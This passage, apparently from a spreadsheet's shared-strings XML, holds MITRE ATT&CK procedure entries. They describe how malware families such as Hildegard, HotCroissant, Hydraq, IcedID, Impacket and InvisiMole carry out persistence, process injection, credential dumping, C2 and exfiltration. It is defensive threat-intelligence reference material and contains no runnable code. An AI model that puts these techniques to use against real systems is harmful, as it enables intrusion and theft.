    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used masscan to look for kubelets in the internal Kubernetes network.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has encrypted an ELF file.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has searched for private keys in .ssh.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has established tmate sessions for C2 communications.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used xmrig to mine cryptocurrency.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified /etc/ld.so.preload to overwrite readdir() and readdir64().(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has packed ELF files into other binaries.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has collected the host's OS, CPU, and memory information.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has started a monero service.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used shell scripts for execution.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has downloaded scripts from GitHub.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list the names of all open windows on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to download files from the infected host to the command and control (C2) server.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to clean up installed files, delete files, and delete itself from the victim’s machine.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of files in a given directory as well as drives and drive types.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to hide the window for operations performed on a given file.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to upload a file from the command and control (C2) server to the victim machine.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can perform dynamic DLL importing and API lookups using &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt; on obfuscated strings.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has encrypted strings with single-byte XOR and base64 encoded RC4.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list running processes on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has attempted to install a scheduled task named “Java Maintenance64” on startup to establish persistence.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to do real time screen viewing on an infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to stop services on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can retrieve a list of applications from the &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths&lt;/code&gt; registry key.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has used the open source UPX executable packer.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has compressed network communications and encrypted them with a custom stream cipher.(Citation: Carbon Black HotCroissant April 2020)(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to identify the IP address of the compromised machine.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to collect the username on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of services on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can remotely open applications on the infected host with the &lt;code&gt;ShellExecuteA&lt;/code&gt; command.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can adjust token privileges.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can clear all system event logs.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can read data from files.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) connects to a predefined domain on port 443 to exfil gathered information.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can download files and additional malware components.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. [Hydraq](https://attack.mitre.org/software/S0203)'s backdoor also enables remote attackers to modify and delete subkeys.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) uses basic obfuscation in the form of spaghetti code.(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can monitor processes.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) uses svchost.exe to execute a malicious DLL included in a new service group.(Citation: Symantec Hydraq Persistence Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can load and call DLL functions.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) C2 traffic is encrypted using bitwise NOT and XOR operations.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can monitor services.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates new services to establish persistence.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)(Citation: Symantec Hydraq Persistence Jan 2010)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to delete a specified file.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to download additional files.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to run an application (&lt;code&gt;CreateProcessW&lt;/code&gt;) or script/file (&lt;code&gt;ShellExecuteW&lt;/code&gt;) via API.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can run shellcode it injects into a newly created process.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to take screenshots.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to start and stop a specified service.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can list all services and their configurations.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has used HTTPS for C2 communications.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>Default Accounts</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can use default credentials to connect to IPC$ shares on remote machines.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can connect to the IPC$ share on remote machines.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can enumerate all account names on a remote share.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can add the name of its communication pipe to &lt;code&gt;HKLM\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\NullSessionPipes&lt;/code&gt;.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can use Windows API's &lt;code&gt;ConnectNamedPipe&lt;/code&gt; and &lt;code&gt;WNetAddConnection2&lt;/code&gt; to detect incoming connections and connect to remote shares.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) has used RSA encryption for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) uses the &lt;code&gt;certutil&lt;/code&gt; command to decode a payload file.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) creates scheduled tasks to establish persistence.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used SSL and TLS in communications with C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used &lt;code&gt;ZwQueueApcThread&lt;/code&gt; to inject itself into remote processes.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) can query LDAP to identify additional users on the network to infect.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to download additional modules and a configuration file from C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has been executed through Word documents with malicious embedded macros.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials.  [IcedID](https://attack.mitre.org/software/S0483) can use a self signed TLS certificate in connection with the spoofed site and simultaneously maintains a live connection with the legitimate site to display the correct URL and certificates in the browser.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application. (Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has called &lt;code&gt;ZwWriteVirtualMemory&lt;/code&gt;, &lt;code&gt;ZwProtectVirtualMemory&lt;/code&gt;, &lt;code&gt;ZwQueueApcThread&lt;/code&gt;, and &lt;code&gt;NtResumeThread&lt;/code&gt; to inject itself into a remote process.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has utilzed encrypted binaries and base64 encoded strings.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify Workgroup membership.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has established persistence by creating a Registry run key.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has created a scheduled task that executes every hour to establish persistence.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has packed and encrypted its loader module.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has been delivered via phishing e-mails with malicious attachments.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has embedded binaries within RC4 encrypted .png files.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify the computer name and OS version on a compromised host.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used obfuscated VBA string expressions.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used HTTPS in communications with C2.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used WMI to execute binaries.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote microphone monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a PasswordRecoveryPacket module for recovering browser passwords.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has decoded malware components that are then dropped to the system.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a feature to disable Windows Task Manager.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has uploaded a file containing debugger logs, network information and system information to the C2.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has deleted files related to its dynamic debugger feature.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to set the file attribute to hidden.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a keylogging module.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has leveraged CreateProcessW() call to execute the debugger.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a "Process Watcher" feature to monitor processes in case the client ever crashes or gets closed.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a module for performing remote desktop access.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has the capability to run a cryptocurrency miner on the victim machine.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote webcam monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) modules like GetUserSPNs can be used to get Service Principal Names (SPNs) for user accounts. The output is formatted to be compatible with cracking tools like John the Ripper and Hashcat.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) modules like ntlmrelayx and smbrelayx can be used in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040) and [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001) to gather NetNTLM credentials for [Brute Force](https://attack.mitre.org/techniques/T1110) or relay attacks that can gain code execution.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information from NTDS.dit.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) can be used to sniff network traffic via an interface or raw socket.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) contains various modules emulating other service execution tools such as [PsExec](https://attack.mitre.org/software/S0029).(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357)'s wmiexec module can be used to execute commands through WMI.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) has a command to delete files.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) enumerates directories and obtains file attributes on a system.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) variants have attempted to appear legitimate by adding a new service named OfficeUpdateService.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) uses the API call ShellExecuteW for execution.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>Some [InnaputRAT](https://attack.mitre.org/software/S0259) variants establish persistence by modifying the Registry key &lt;code&gt;HKU\&lt;SID&gt;\Software\Microsoft\Windows\CurrentVersion\Run:%appdata%\NeutralApp\NeutralApp.exe&lt;/code&gt;.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) gathers volume drive information and system information.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) launches a shell to execute commands on the victim’s machine.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>Some [InnaputRAT](https://attack.mitre.org/software/S0259) variants create a new Windows service to establish persistence.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate windows and child windows on a compromised host.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses a variation of the XOR cipher to encrypt files before exfiltration.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use zlib to compress and decompress data.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses WinRAR to compress data that is intended to be exfiltrated.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can inject its code into a trusted process via the APC queue.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can record sound using input audio devices.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use fileless UAC bypass and create an elevated COM object to escalate privileges.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>Component Object Model</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use the &lt;code&gt;ITaskService&lt;/code&gt;, &lt;code&gt;ITaskDefinition&lt;/code&gt; and &lt;code&gt;ITaskSettings&lt;/code&gt; COM interfaces to schedule a task.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>Control Panel</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can register itself for execution and persistence via the Control Panel.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect data from the system, and can monitor changes in specified directories.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect jpeg files from connected MTP devices.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to disable routing and the Firewall on the victim’s machine.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>Environmental Keying</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use Data Protection API to encrypt its components on the victim’s computer, to evade detection, and to make sure the payload can only be decrypted and loaded on one specific compromised computer.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>External Proxy</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) InvisiMole can identify proxy servers used by the victim and use them for C2 communication.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has been configured with several servers available for alternate C2 communications.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has deleted files and directories including XML and files successfully uploaded to C2 servers.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can list information about files in a directory and recently opened or used documents. [InvisiMole](https://attack.mitre.org/software/S0260) can also search for specific files by supplied file mask.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can create hidden system directories.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has executed legitimate tools in hidden windows.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has undergone regular technical improvements in an attempt to evade detection.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can upload files to the victim's machine for operations.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can can remove all system restore points.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can function as a proxy to create a server that relays communication between the client and C&amp;C server, or between two clients.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a JavaScript file as part of its execution chain.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can capture keystrokes on a compromised host.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to list account information on the victim’s machine.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
